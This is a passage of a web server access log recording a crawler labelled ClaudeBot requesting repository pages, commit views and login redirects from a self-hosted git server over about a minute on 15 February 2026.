ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/.gitignore" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images" [Client 216.73.216.188] [Length 10166] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py" [Client 216.73.216.188] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/status.json" [Client 216.73.216.188] [Length 11042] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/Dockerfile" [Client 216.73.216.188] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md?display=rendered" [Client 216.73.216.188] [Length 15902] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 1112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 216.73.216.188] [Length 947] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" [Client 216.73.216.188] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/requirements.txt?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" [Client 216.73.216.188] [Length 10143] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good" [Client 216.73.216.188] [Length 6438] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" [Client 216.73.216.188] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/.gitignore" -[15/Feb/2026:10:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup" [Client 216.73.216.188] [Length 9852] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py" [Client 216.73.216.188] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" [Client 216.73.216.188] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2Fapp%2Fmodels.py" [Client 216.73.216.188] [Length 26367] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/fetcher.py.good?display=rendered" [Client 216.73.216.188] [Length 10895] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=rendered" [Client 216.73.216.188] [Length 11161] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fcomponents%2FContact.tsx" [Client 216.73.216.188] [Length 28730] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-2.conf" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" [Client 216.73.216.188] [Length 13007] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/mail_contact.py?display=rendered" [Client 216.73.216.188] [Length 10890] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 24715] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py" [Client 216.73.216.188] [Length 12997] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html?display=rendered" [Client 216.73.216.188] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fcomponents%2FServices.tsx" [Client 216.73.216.188] [Length 26580] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Finclude%2Fsite%2Fpython3.12%2Fgreenlet%2Fgreenlet.h" [Client 216.73.216.188] [Length 29162] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json?display=rendered" [Client 216.73.216.188] [Length 10891] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 62471] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-2.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-2.conf" -[15/Feb/2026:10:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/.gitignore" [Client 216.73.216.188] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=.TemporaryDocument%2FDOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 31624] [Gzip 6.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/index.html" [Client 216.73.216.188] [Length 14395] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 11494] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/js/i18n.js" [Client 216.73.216.188] [Length 17296] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument" [Client 216.73.216.188] [Length 9868] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin%2Factivate" [Client 216.73.216.188] [Length 26046] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fcomponents%2FFooter.tsx" [Client 216.73.216.188] [Length 26197] [Gzip 5.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-6.conf" -[15/Feb/2026:10:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/pyvenv.cfg" -[15/Feb/2026:10:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/letsencrypt/renewal/npm-1.conf" -[15/Feb/2026:10:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-6.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/pyvenv.cfg" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-1.conf" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/letsencrypt/renewal/npm-6.conf" -[15/Feb/2026:10:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 